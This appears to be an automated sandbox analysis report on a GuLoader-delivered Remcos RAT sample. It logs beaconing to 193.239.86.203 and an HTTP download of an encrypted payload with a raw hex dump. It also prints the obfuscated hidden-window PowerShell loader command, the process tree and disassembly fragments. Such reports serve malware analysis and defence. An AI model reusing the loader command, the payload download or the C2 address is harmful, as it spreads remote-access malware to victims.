                        Apr 25, 2024 21:37:20.859421015 CEST270049744193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:21.371166945 CEST497442700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:21.687679052 CEST270049744193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:22.703252077 CEST497453702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:23.019359112 CEST370249745193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:23.527447939 CEST497453702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:23.843570948 CEST370249745193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:24.355549097 CEST497453702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:24.671878099 CEST370249745193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:25.183698893 CEST497453702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:25.499816895 CEST370249745193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:26.089939117 CEST497453702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:26.406059980 CEST370249745193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:26.408746958 CEST497464089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:26.733689070 CEST408949746193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:27.246196985 CEST497464089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:27.571837902 CEST408949746193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:28.074366093 CEST497464089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:28.399455070 CEST408949746193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:28.902405977 CEST497464089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:29.227652073 CEST408949746193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:29.730663061 CEST497464089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:30.055682898 CEST408949746193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:30.059196949 CEST497474093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:30.385499954 CEST409349747193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:30.886820078 CEST497474093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:31.213196993 CEST409349747193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:31.714986086 CEST497474093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:32.041301966 CEST409349747193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:32.543067932 CEST497474093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:32.869482994 CEST409349747193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:33.371277094 CEST497474093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:33.697841883 CEST409349747193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:33.703015089 CEST497482700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:34.016426086 CEST270049748193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:34.527610064 CEST497482700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:34.839713097 CEST270049748193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:35.340049028 CEST497482700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:35.652132988 CEST270049748193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:36.168056965 CEST497482700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:36.480233908 CEST270049748193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:36.996278048 CEST497482700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:37.308336973 CEST270049748193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:38.325778008 CEST497493702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:38.642395020 CEST370249749193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:39.152518034 CEST497493702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:39.469146013 CEST370249749193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:39.980637074 CEST497493702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:40.297282934 CEST370249749193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:40.808720112 CEST497493702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:41.125216961 CEST370249749193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:41.636953115 CEST497493702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:41.953735113 CEST370249749193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:42.667197943 CEST497504089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:42.979259968 CEST408949750193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:43.480593920 CEST497504089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:43.795635939 CEST408949750193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:44.308681011 CEST497504089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:44.623965979 CEST408949750193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:45.136826038 CEST497504089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:45.448951006 CEST408949750193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:45.949420929 CEST497504089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:46.261482000 CEST408949750193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:46.263597012 CEST497514093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:46.576527119 CEST409349751193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:47.090037107 CEST497514093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:47.402256012 CEST409349751193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:47.902477980 CEST497514093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:48.214977980 CEST409349751193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:48.715048075 CEST497514093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:49.027230024 CEST409349751193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:49.527460098 CEST497514093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:49.839648962 CEST409349751193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:49.843210936 CEST497522700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:50.153318882 CEST270049752193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:50.668236017 CEST497522700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:50.978423119 CEST270049752193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:51.480555058 CEST497522700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:51.790252924 CEST270049752193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:52.293118954 CEST497522700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:52.603209019 CEST270049752193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:53.105640888 CEST497522700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:53.415385962 CEST270049752193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:54.421336889 CEST497533702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:54.732249975 CEST370249753193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:55.246391058 CEST497533702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:55.557365894 CEST370249753193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:56.058741093 CEST497533702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:56.369430065 CEST370249753193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:56.871186972 CEST497533702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:57.182044029 CEST370249753193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:57.683773994 CEST497533702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:57.994656086 CEST370249753193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:57.996526957 CEST497544089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:58.307713985 CEST408949754193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:58.824325085 CEST497544089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:59.135632038 CEST408949754193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:59.636832952 CEST497544089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:59.950170040 CEST408949754193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:00.465004921 CEST497544089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:00.776308060 CEST408949754193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:01.293090105 CEST497544089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:01.604470968 CEST408949754193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:02.883555889 CEST497554093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:03.195404053 CEST409349755193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:03.699366093 CEST497554093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:04.011271954 CEST409349755193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:04.589946985 CEST497554093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:04.901864052 CEST409349755193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:05.402445078 CEST497554093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:05.714282990 CEST409349755193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:06.230596066 CEST497554093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:06.542536020 CEST409349755193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:06.543608904 CEST497562700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:06.853622913 CEST270049756193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:07.355603933 CEST497562700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:07.665863037 CEST270049756193.239.86.203192.168.2.4
                        Apr 25, 2024 21:38:08.168210983 CEST497562700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:38:08.478349924 CEST270049756193.239.86.203192.168.2.4
                        • 193.239.86.203
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449735193.239.86.203803844C:\Program Files (x86)\Windows Mail\wab.exe
                        TimestampBytes transferredDirectionData
                        Apr 25, 2024 21:36:46.812903881 CEST170OUTGET /XWJPh99.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: 193.239.86.203
                        Cache-Control: no-cache
                        Apr 25, 2024 21:36:47.124973059 CEST1289INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Last-Modified: Wed, 24 Apr 2024 21:30:59 GMT
                        Accept-Ranges: bytes
                        ETag: "ae5de8b28e96da1:0"
                        Server: Microsoft-IIS/8.5
                        Date: Thu, 25 Apr 2024 19:36:44 GMT
                        Content-Length: 494656
                        Data Raw: df f1 9f 0c 28 df e8 5c f5 fa 59 3d 29 d8 5a 3f d4 8f 38 ac d9 4f 2a ae 1d c2 7f 8f 61 15 f8 71 47 a9 c3 3d e3 6b 22 3f 81 b1 e3 fd 96 ce 05 8d 6e 71 29 f6 2e 6b 84 06 cf 2e 9b 95 3f 54 ef 9e 67 c0 1b 4b 02 1c 1d 2f c1 0b e3 9c 1e 49 c5 f9 3a e2 c3 6e 29 68 8f 80 a7 02 68 36 70 ca c4 4f 96 1b 64 30 ea 4b 07 51 ab f7 83 e0 79 f4 c8 a3 fa f7 d4 2c c5 a0 00 29 75 7c 3b 0d 07 f5 b0 75 91 06 97 89 61 de e7 19 22 fc 4f 83 79 e3 33 f4 fc 19 fb 4e 93 3f 94 d8 33 bc 6a 1f 8f f6 d2 e3 0c d4 66 f1 6e e0 42 e3 ff 38 86 a6 ff c0 ea 22 ea c2 0b 89 7e 69 5a 6b 98 c5 60 8e 28 24 84 a4 49 b0 aa 4a 6c 32 82 44 e7 2c 84 20 18 45 e9 d5 cc e6 f1 85 ee 4c 62 e3 03 ab d9 1e 1a 25 69 d9 84 70 95 6e dd 0c 73 e4 1a 3c 0a 80 c5 f5 6d 78 f7 2c bb 9b c4 43 79 36 c2 64 98 5d 34 1d 25 84 db 25 32 76 b6 b8 ee 68 cb 07 5d a3 76 ba 77 7c ac 4d b1 bd bf ce 19 59 3b 1d b5 04 27 f8 aa ca 04 b1 8d 72 0d 5b aa 61 4b 2c 2c 75 8c d6 01 4b ce 76 36 c3 29 95 64 d2 57 f8 12 b1 2c d0 21 b3 e6 e5 6a 36 43 7f 80 e3 30 1d 7e 3a ff 3e d4 aa 2f 73 1c 91 43 14 fa 71 17 03 ff 39 0e 7f 8f af 5c 89 3c dc 9d a4 f6 54 ee 27 3d 03 3e 1e 16 47 18 8c 57 27 79 8b bf e4 1b 4a dc 1f f1 c5 9b 9d d8 6a 45 89 05 07 ee f0 5a 22 e7 c0 9a 51 fc e8 f6 1e bf 9e 2c bf ee 08 77 cc 9b 81 f0 77 45 3c 92 72 de 80 5a 5a 7b 2a a2 06 5c bc 75 b4 ea 96 12 0f c3 b2 15 3b 83 0f 60 3b 29 6a 6d 70 03 e7 5c eb 29 0c 2b 60 68 e8 80 8f 84 39 04 c5 3a e4 f5 81 b3 25 e8 15 5a 47 f7 32 41 10 d6 cf f9 fc 55 a0 17 b0 63 e0 fb 81 3f 2e 89 6a bd 62 b4 d9 3c f7 e8 c1 0f 4b 8b 1d 5e 3e 7a 48 67 67 73 c0 2f 76 2a d6 68 c8 34 b5 27 5d c4 4f b0 d2 9d 29 ba df fe e3 46 7f aa 72 b5 d7 99 ec 89 90 ea ef e1 0b 2e e2 60 b6 e2 07 f9 ae 8b fe fd bb 29 6b 4a cc 8f 79 8d e8 19 15 d7 b0 18 4d e1 4c 83 92 84 8e 77 3c e9 42 78 cf d9 c9 fb 84 2f a0 19 55 91 8e 69 92 e7 c8 36 00 f3 5d 55 51 26 2a 57 4a 21 69 19 00 5c 93 4e 43 2c 5d f2 5c 66 4d 05 fe 12 05 74 86 91 45 b4 00 81 23 31 93 ac fc 04 b8 8b 46 dd 98 49 55 d7 d4 2b 95 7d 56 ec 54 63 4d 07 be 29 1c be 21 c8 81 7f 07 bf b0 75 81 34 8b 32 1f e9 8f d4 20 b1 6d cd 8b b1 7a 87 18 11 83 a9 d1 df a6 0c 63 1c 57 fa ba f6 4c 74 12 08 10 71 aa 41 7d af c0 4b 76 9d e1 07 e1 03 6b 96 85 86 eb 37 0e 6e 2b 1f bb 49 a3 b5 9d 7a 21 ea 5d 00 ec df 1e e9 8c 7d 5f 86 5b 93 b2 1a e6 bb c8 52 89 ab 83 d4 34 bb 7e 2e 88 ea 72 2d 6e ae 8c 95 d1 b3 7c aa 19 4f 3b 1f 5a 77 42 06 94 3e 92 32 d5 11 98 19 4c 23 3a e3 7c 0e 85 ae 69 9d e3 a8 7e da 36 43 fc 9c 58 55 84 ed 2a 70 a6 0e c1 00 36 0a de 28 87 f4 88 79 26 7d 37 e5 71 80 5d 2a fd 67 26 df ee 5d 6f 78 78 f1 ac 38 b1 4e 9b 6b 17 da d6 17 5c 30 c8 80 c3 ef b4 74 93 69 a4 a3 5b 99 3d 44 5a 91 9a 63 bb 61 da 82 e6 bd 6b 39 97 89 4f 30 ca a6 1e 57 bf 97 08 66 56 61 99 4a 70 c6 12 e1 99 ec fa af 3b 28 af 43 08 4f 3f 5b 02 58 79 d3 ea 84 b7 13 b7 4d 4b 38 a4 75 a5 56 28 25 fe c5 98 2e b1 2f 80 0b 83 73 f0 6e a7 bf e4 07 88 cc 33 34 ef 51 28 04 90 55 9b 81 a1 f1 27 14 bd 48 14 90 56 72 95 d1 3f a9 48 9c 3f d9 18 3b 53 dc 5a 51 6b 23 df 3b e2 a7 23 15 ff 37 2f 84 aa f9 e4 18 b3 ce 66 46 81 88 ef d9 51 f9 b0 83 56 3d 2b a1 8c 5f f3 66 1b 42 a7 e0 c4 2e f0 23 fe 29 8a 78 96 68 31 7e 1c 66 d3 ce 48 38 a2 ba 8a 4e d1 dc
                        Data Ascii: (\Y=)Z?8O*aqG=k"?nq).k.?TgK/I:n)hh6pOd0KQy,)u|;ua"Oy3N?3jfnB8"~iZk`($IJl2D, ELb%ipns<mx,Cy6d]4%%2vh]vw|MY;'r[aK,,uKv6)dW,!j6C0~:>/sCq9\<T'=>GW'yJjEZ"Q,wwE<rZZ{*\u;`;)jmp\)+`h9:%ZG2AUc?.jb<K^>zHggs/v*h4']O)Fr.`)kJyMLw<Bx/Ui6]UQ&*WJ!i\NC,]\fMtE#1FIU+}VTcM)!u42 mzcWLtqA}Kvk7n+Iz!]}_[R4~.r-n|O;ZwB>2L#:|i~6CXU*p6(y&}7q]*g&]oxx8Nk\0ti[=DZcak9O0WfVaJp;(CO?[XyMK8uV(%./sn34Q(U'HVr?H?;SZQk#;#7/fFQV=+_fB.#)xh1~fH8N
                        Apr 25, 2024 21:36:47.125024080 CEST1289INData Raw: 30 a3 53 dc fe 48 4c cb 6b 2b 69 c5 0b 8f 17 87 18 0e 21 71 a1 e2 2f 4a d3 f5 89 3d a9 48 5e 21 c1 13 47 74 9a d9 04 fe 51 14 a9 01 fe 0f 97 17 11 71 f6 3d 98 bb 52 17 a9 50 68 2e 8a 8d 3e 8d 51 ba 77 64 f8 4e 15 22 a1 05 21 b7 51 15 13 6f b1 f6
                        Data Ascii: 0SHLk+i!q/J=H^!GtQq=RPh.>QwdN"!Qo"D^Y9>@YBhmOf}@^tz\`[qhj)S!#jK?;%4-Ig|*Ix$Ls6:P@-c%<QzK{X4xxbmO6Knv/
                        Apr 25, 2024 21:36:47.125066042 CEST1289INData Raw: da 6a 68 87 86 4b 63 f4 88 c7 b9 f6 24 77 93 4d d0 b7 a4 1f 0d af 99 88 1e d9 60 42 e1 eb 75 a3 86 86 b0 f4 66 39 54 5c bb a1 c1 87 9e 7a 78 29 35 61 6d 9a 1e 41 da 4f 9c a8 65 36 62 ae b4 fc c8 8a 2e 96 80 d4 dc d7 ff 6b 8c 02 32 1f 6d a9 d5 56
                        Data Ascii: jhKc$wM`Buf9T\zx)5amAOe6b.k2mVfXYXnN;r_1X)$:LWNCkzG<`1Y >]8z/2b0%%6'VjP.Ua%Mb>KUbx,[]KM^u
                        Apr 25, 2024 21:36:47.125117064 CEST1289INData Raw: 08 35 1d 7e 9b 2b 55 93 aa be d6 19 92 0a 81 b0 36 4c 58 33 0c f1 4a 47 85 1b 89 c3 c9 39 30 b1 55 6e 2b e7 68 79 6c fb 90 e5 65 aa a4 44 df d4 a3 f4 fc aa 10 7a 1a 73 95 f6 fa 40 d8 8e c8 46 6b 74 32 e7 43 76 4b 71 ac d7 36 35 52 7c 57 54 0e 72
                        Data Ascii: 5~+U6LX3JG90Un+hyleDzs@Fkt2CvKq65R|WTr{`R!5<*0i};H`uN}w\vR`Bi`Z>G|xMS$]lOWj(\sZY/#Bht{)j[(.DiD1!9/)
                        Apr 25, 2024 21:36:47.436629057 CEST1289INData Raw: a7 ba 22 44 ee b4 39 7c 92 74 0c 4b 72 b1 15 0e 39 08 93 12 ea d7 e3 8c 0d b2 c1 f2 e5 d5 97 b6 dc 5d e4 89 e2 bf 38 22 e0 46 62 6b 88 20 45 04 17 3a 7f 66 c7 b8 22 7b bb 22 6f b7 d8 9b ec 0c 9c 20 a7 49 86 55 e3 d1 24 8a bc 4f 64 7d 6e ff d7 2b
                        Data Ascii: "D9|tKr9]8"Fbk E:f"{"o IU$Od}n+Gxr)6@DMcN6}+9h;POKQ|D"-8zNQw|;gQaje]$KC}>GH|CxpBzQ*2K$m.$/uc$WP>]Pl
                        Apr 25, 2024 21:36:47.436671972 CEST1289INData Raw: 19 64 4f 6b fd c8 6d 06 65 19 90 ae a0 6d 9a 62 48 44 83 92 05 e5 fa 9b b0 fa 1b e3 5d 3d 03 a2 53 7f f9 1e 5b 76 65 3b 8a 27 ed 7d 30 b3 23 56 4b 4a 87 b2 0a 47 a2 47 90 0f 6a 9e 10 6e d6 53 9e 98 1a ca 3a 60 d4 37 0f c1 23 89 6f 7c ac bb ac 17
                        Data Ascii: dOkmembHD]=S[ve;'}0#VKJGGjnS:`7#o|tLFq,)(;F|EWFL60=KS'7x9(Bwu/v:-hhyG>MhV%s59:[L=@.w{Y]G>a0Y)=
                        Apr 25, 2024 21:36:47.436726093 CEST1289INData Raw: c1 bf 2e 20 18 66 13 71 60 c4 18 f9 ab 91 4c 3f 5b e9 6a f9 af ce 94 b7 67 a8 ce b5 28 d7 6f 2e 99 c0 36 07 3a 67 a5 7e a4 80 30 73 7c b2 a8 f7 d5 e5 ef 1b 36 cc cb 04 5d ad f2 e5 5f cd 0a 6e 19 37 14 bd 48 91 66 09 7d 00 11 61 6b 40 9c d7 95 e7
                        Data Ascii: . fq`L?[jg(o.6:g~0s|6]_n7Hf}ak@rR_tB'{#N|>dO)zLrC(R!.#3[4r0.pb{-2mA6>x5F@ZUlH{%HgxglP:VHnJZ
                        Apr 25, 2024 21:36:47.436767101 CEST1289INData Raw: cf fb eb c8 c5 6f 9e cb ed e3 b7 0a 9f 49 61 c3 f5 fc 86 fe 6b be d6 1f 6e c0 70 0d a9 e4 f1 91 3f 4f e7 ce 25 40 41 9a 84 67 69 3c e9 42 29 27 e9 bd 9e fc 02 62 1d 55 0d d8 6c 92 e7 89 de 18 f3 2f 50 08 e4 2a 57 a3 0a 69 19 00 e4 39 e4 e9 26 9e
                        Data Ascii: oIaknp?O%@Agi<B)'bUl/P*Wi9&ybI<wlZ0mktH5+Z.Pc'()!;E8IrBQp+NMNAsZ6E8+$ob.dzyxF^S<VJbaN*VXl.j8_{T*%9"G}gCUS
                        Apr 25, 2024 21:36:47.436806917 CEST1289INData Raw: 6f 12 99 13 af 8f 68 ec f9 d5 30 03 65 30 6c 26 45 2b 11 37 a9 85 47 d2 c6 d6 51 5e 00 32 79 a3 60 0d 98 f7 5d d7 b7 9d ff 9d 72 25 09 54 72 f7 90 67 43 ef 74 a6 2b d7 53 56 17 fe 8c 0f e8 8d ef 9e 71 e6 8e b9 27 8e 79 4b ab 7f a4 f7 f0 90 c1 eb
                        Data Ascii: oh0e0l&E+7GQ^2y`]r%TrgCt+SVq'yKf+G~<wlhAZt9Q *3;=5<C7f2Cp(mtBKyz\px[~;ElIs'!?ep{GT(pm]
                        Apr 25, 2024 21:36:47.436846972 CEST1289INData Raw: ef 0b 6e 19 12 1d f2 fe 9d 40 17 db 1f 79 0a 19 e3 40 ef ce c6 ef 36 3c 8e df e1 95 81 a5 14 69 96 e0 c8 f7 05 4e 08 8e f5 b1 41 ee 49 47 81 d8 78 a1 f3 e2 ff b2 7a 35 6c 20 73 8c e5 ae 8b 52 d9 f9 6d c8 e4 af 83 24 27 08 82 fb e6 e9 6d 56 b9 eb
                        Data Ascii: n@y@6<iNAIGxz5l sRm$'mV.Gp+_4cynB18M?7lQ{KFnp=^D+vD_6OvdxKM~Ic^67:1'p7DBuB^\h$gN[6p
                        Apr 25, 2024 21:36:47.436886072 CEST1289INData Raw: a0 c4 a0 2b 02 cb a0 f3 1f 5f d1 7a cb 55 96 3f db c1 f1 ea 04 2a 41 7e ec 1e fa b7 29 2b 9a 46 ec b9 7f 3d 2a 78 e3 53 2d 6f 05 ea b1 c3 60 01 f8 67 b6 05 dd 87 0e 2a 96 1a ea ce ad 76 1d c7 cd af bd 54 5f f7 ea cc 62 95 b1 04 86 50 4c c0 22 29
                        Data Ascii: +_zU?*A~)+F=*xS-o`g*vT_bPL")9EqV=.[)_6'!'SQhgN =0gy#'y5-rsO1W<m'IB-}Ly%1vXeZ"zneTw]?PT{%%IcpSrz,


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:21:35:55
                        Start date:25/04/2024
                        Path:C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
                        Imagebase:0x400000
                        File size:794'761 bytes
                        MD5 hash:1C089552C29F12843D8CD8E2BBF5CF5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:21:35:56
                        Start date:25/04/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
                        Imagebase:0x9f0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:21:35:56
                        Start date:25/04/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:21:35:57
                        Start date:25/04/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:21:36:38
                        Start date:25/04/2024
                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                        Imagebase:0x300000
                        File size:516'608 bytes
                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:27.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:20.4%
                          Total number of Nodes:1343
                          Total number of Limit Nodes:34
                          execution_graph 3818 401c41 3819 403002 21 API calls 3818->3819 3820 401c4a 3819->3820 3821 403002 21 API calls 3820->3821 3822 401c53 3821->3822 3825 406645 wsprintfW 3822->3825 3824 401cdb 3825->3824 3826 4056c1 lstrlenW WideCharToMultiByte 3827 402b42 3828 402b48 3827->3828 3829 402b50 FindNextFileW 3828->3829 3830 4018be 3828->3830 3829->3830 3831 4024c2 3832 40303e 21 API calls 3831->3832 3833 4024c8 3832->3833 3834 40303e 21 API calls 3833->3834 3835 4024d1 3834->3835 3836 40303e 21 API calls 3835->3836 3837 4024da 3836->3837 3838 4065f5 2 API calls 3837->3838 3839 4024e2 3838->3839 3840 4024f3 lstrlenW lstrlenW 3839->3840 3841 405d6f 28 API calls 3839->3841 3844 402ea1 3839->3844 3842 405d6f 28 API calls 3840->3842 3841->3839 3843 40253a SHFileOperationW 3842->3843 3843->3839 3843->3844 3255 404fc7 3256 404fe6 3255->3256 3257 405168 3255->3257 3256->3257 3260 404ff2 3256->3260 3258 4051b5 3257->3258 3259 40517c GetDlgItem GetDlgItem 3257->3259 3262 40520c 3258->3262 3274 401399 91 API calls 3258->3274 3261 40554f 22 API calls 3259->3261 3263 405011 3260->3263 3264 404ff7 SetWindowPos 3260->3264 3268 40519f SetClassLongW 3261->3268 3265 40551d SendMessageW 3262->3265 3275 405163 3262->3275 3266 405064 3263->3266 3267 405016 ShowWindow 3263->3267 3269 405154 3264->3269 3298 40521e 3265->3298 3271 405086 3266->3271 3272 40506c DestroyWindow 3266->3272 3267->3269 3270 40503b GetWindowLongW 3267->3270 3273 401533 91 API calls 3268->3273 3276 405790 8 API calls 3269->3276 3270->3269 3277 405057 ShowWindow 3270->3277 3278 40508b SetWindowLongW 3271->3278 3279 40509e 3271->3279 3282 40549d 3272->3282 3273->3258 3280 4051e5 3274->3280 3276->3275 3277->3269 3278->3275 3279->3269 3284 4050aa GetDlgItem 3279->3284 3280->3262 3285 4051e9 SendMessageW 3280->3285 3281 401533 91 API calls 3281->3298 3282->3275 3286 4054d0 ShowWindow 3282->3286 3283 40549f DestroyWindow EndDialog 3283->3282 3287 4050c6 SendMessageW IsWindowEnabled 3284->3287 3288 4050e9 3284->3288 3285->3275 3286->3275 3287->3275 3290 4050e5 3287->3290 3291 4050f8 3288->3291 3292 40510a 3288->3292 3293 40513b SendMessageW 3288->3293 3302 4050f0 3288->3302 3289 405ece 21 API calls 3289->3298 3290->3288 3291->3293 3291->3302 3296 405121 3292->3296 3297 405113 3292->3297 3293->3269 3294 40554f 22 API calls 3294->3298 3295 